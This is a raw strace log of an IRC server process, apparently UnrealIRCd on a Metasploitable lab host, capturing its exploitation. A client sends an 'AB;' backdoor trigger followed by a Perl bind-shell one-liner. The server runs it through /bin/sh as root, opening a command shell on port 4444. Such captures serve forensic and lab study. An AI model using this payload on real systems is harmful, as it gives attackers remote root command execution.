4519  07:43:06.784640 select(1024, [2 3 4 7 9], [], NULL, {0, 870000}) = 1 (in [2], left {0, 670000})

4519  07:43:06.988089 clock_gettime(CLOCK_MONOTONIC, {2996, 805110393}) = 0

4519  07:43:06.988111 time(NULL)        = 1495626186

4519  07:43:06.988121 time(NULL)        = 1495626186

4519  07:43:06.988133 gettimeofday({1495626186, 988137}, NULL) = 0

4519  07:43:06.988145 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:43:06.988185 clock_gettime(CLOCK_MONOTONIC, {2996, 805197526}) = 0

4519  07:43:06.988195 gettimeofday({1495626186, 988199}, NULL) = 0

4519  07:43:06.988206 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:43:06.988245 clock_gettime(CLOCK_MONOTONIC, {2996, 805257631}) = 0

4519  07:43:06.988256 accept(2, 0, NULL) = 5

4519  07:43:06.988277 getpeername(5, {sa_family=AF_INET, sin_port=htons(41303), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:43:06.988308 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:06.988320 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:06.988333 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:43:06.988345 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:43:06.988357 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:43:06.988368 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:43:06.988431 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:43:06.988452 clock_gettime(CLOCK_MONOTONIC, {2996, 805465855}) = 0

4519  07:43:06.988464 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:43:06.988477 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:06.988486 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:06.988495 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:43:06.988567 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:43:06.988586 send(6, "G[\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:43:06.988652 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:43:06.988674 gettimeofday({1495626186, 988698}, NULL) = 0

4519  07:43:06.988705 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:43:06.991943 clock_gettime(CLOCK_MONOTONIC, {2996, 808980142}) = 0

4519  07:43:06.991984 recvfrom(6, "G[\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\37\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:43:06.992119 close(6)          = 0

4519  07:43:06.992142 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:43:06.992195 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:43:06.992326 time(NULL)        = 1495626186

4519  07:43:06.992344 time(NULL)        = 1495626186

4519  07:43:06.992361 gettimeofday({1495626186, 992367}, NULL) = 0

4519  07:43:06.992378 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:43:06.992421 clock_gettime(CLOCK_MONOTONIC, {2996, 809437140}) = 0

4519  07:43:06.992457 gettimeofday({1495626186, 992582}, NULL) = 0

4519  07:43:06.992596 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 760000})

4519  07:43:07.231316 clock_gettime(CLOCK_MONOTONIC, {2997, 48336333}) = 0

4519  07:43:07.231337 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 70

4519  07:43:07.231363 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231383 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231397 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231411 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231424 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231446 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231460 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231473 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231486 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231500 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231513 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231526 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231539 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231552 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231565 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231578 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231591 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231605 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231618 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231631 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231645 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231646 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:07.231660 gettimeofday({1495626187, 231663}, NULL) = 0

4519  07:43:07.231671 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:43:07.231712 clock_gettime(CLOCK_MONOTONIC, {2997, 48724955}) = 0

4519  07:43:07.231724 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:43:07.231752 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:43:07.231771 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:43:07.231783 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:43:07.231798 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12577

12577 07:43:07.231863 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12577 07:43:07.231877 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12577 07:43:07.231888 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12577 07:43:07.231901 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12577 07:43:07.232007 brk(0)            = 0x80f9000

12577 07:43:07.232077 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.232127 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fae000

12577 07:43:07.232144 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.232162 open("/etc/ld.so.cache", O_RDONLY) = 1

12577 07:43:07.232188 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12577 07:43:07.232207 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa6000

12577 07:43:07.232217 close(1)          = 0

12577 07:43:07.232227 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.232248 open("/lib/libncurses.so.5", O_RDONLY) = 1

12577 07:43:07.232262 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12577 07:43:07.232359 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12577 07:43:07.232376 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f76000

12577 07:43:07.232388 mmap2(0xb7fa3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fa3000

12577 07:43:07.232405 close(1)          = 0

12577 07:43:07.232416 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.232430 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12577 07:43:07.232444 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12577 07:43:07.232543 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12577 07:43:07.232604 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f72000

12577 07:43:07.232631 mmap2(0xb7f74000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f74000

12577 07:43:07.232647 close(1)          = 0

12577 07:43:07.232658 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.232671 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12577 07:43:07.232685 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12577 07:43:07.232775 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12577 07:43:07.232791 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f71000

12577 07:43:07.232805 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e22000

12577 07:43:07.232815 mmap2(0xb7f6b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f6b000

12577 07:43:07.232829 mmap2(0xb7f6e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f6e000

12577 07:43:07.232842 close(1)          = 0

12577 07:43:07.232864 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e21000

12577 07:43:07.232875 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e216b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12577 07:43:07.232930 mprotect(0xb7f6b000, 4096, PROT_READ) = 0

12577 07:43:07.232965 munmap(0xb7fa6000, 29913) = 0

12577 07:43:07.232990 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12577 07:43:07.233004 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12577 07:43:07.233032 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8aba70) = -1 ENOTTY (Inappropriate ioctl for device)

12577 07:43:07.233104 brk(0)            = 0x80f9000

12577 07:43:07.233114 brk(0x80fa000)    = 0x80fa000

12577 07:43:07.233126 brk(0x80fb000)    = 0x80fb000

12577 07:43:07.233142 getuid32()        = 0

12577 07:43:07.233151 getgid32()        = 0

12577 07:43:07.233160 geteuid32()       = 0

12577 07:43:07.233182 getegid32()       = 0

12577 07:43:07.233195 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12577 07:43:07.233209 time(NULL)        = 1495626187

12577 07:43:07.233221 brk(0x80fc000)    = 0x80fc000

12577 07:43:07.233235 brk(0x80fd000)    = 0x80fd000

12577 07:43:07.233253 open("/proc/meminfo", O_RDONLY) = 1

12577 07:43:07.233274 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12577 07:43:07.233292 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fad000

12577 07:43:07.233303 read(1, "MemTotal:      1035240 kB\nMemFree:        312464 kB\nBuffers:         89072 kB\nCached:         472424 kB\nSwapCached:          0 kB\nActive:         258092 kB\nInactive:       432324 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        312224 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5128 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            21148 kB\nSReclaimable:    12288 kB\nSUnreclaim:       8860 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12577 07:43:07.233384 close(1)          = 0

12577 07:43:07.233395 munmap(0xb7fad000, 4096) = 0

12577 07:43:07.233407 brk(0x80fe000)    = 0x80fe000

12577 07:43:07.233432 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12577 07:43:07.233445 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12577 07:43:07.233457 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12577 07:43:07.233468 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12577 07:43:07.233480 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12577 07:43:07.233491 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12577 07:43:07.233504 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12577 07:43:07.233524 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12577 07:43:07.233572 uname({sys="Linux", node="metasploitable", ...}) = 0

12577 07:43:07.233637 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12577 07:43:07.233655 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12577 07:43:07.233687 brk(0x8100000)    = 0x8100000

12577 07:43:07.233699 getcwd("/etc/unreal", 4096) = 12

12577 07:43:07.233713 getpid()          = 12577

12577 07:43:07.233729 getppid()         = 4519

12577 07:43:07.233744 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12577 07:43:07.233763 stat64("/sbin/sh", 0xbf8aba48) = -1 ENOENT (No such file or directory)

12577 07:43:07.233776 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12577 07:43:07.233793 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12577 07:43:07.233816 socket(PF_FILE, SOCK_STREAM, 0) = 1

12577 07:43:07.233828 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12577 07:43:07.233840 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12577 07:43:07.233862 close(1)          = 0

12577 07:43:07.233873 socket(PF_FILE, SOCK_STREAM, 0) = 1

12577 07:43:07.233883 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12577 07:43:07.233893 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12577 07:43:07.233910 close(1)          = 0

12577 07:43:07.233923 open("/etc/nsswitch.conf", O_RDONLY) = 1

12577 07:43:07.233937 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12577 07:43:07.233953 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fad000

12577 07:43:07.233964 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12577 07:43:07.234012 read(1, "", 4096) = 0

12577 07:43:07.234062 close(1)          = 0

12577 07:43:07.234071 munmap(0xb7fad000, 4096) = 0

12577 07:43:07.234088 open("/etc/ld.so.cache", O_RDONLY) = 1

12577 07:43:07.234113 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12577 07:43:07.234129 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa6000

12577 07:43:07.234139 close(1)          = 0

12577 07:43:07.234149 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.234164 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12577 07:43:07.234178 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12577 07:43:07.234265 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12577 07:43:07.234282 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e18000

12577 07:43:07.234293 mmap2(0xb7e1f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e1f000

12577 07:43:07.234313 close(1)          = 0

12577 07:43:07.234324 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.234337 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12577 07:43:07.234350 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

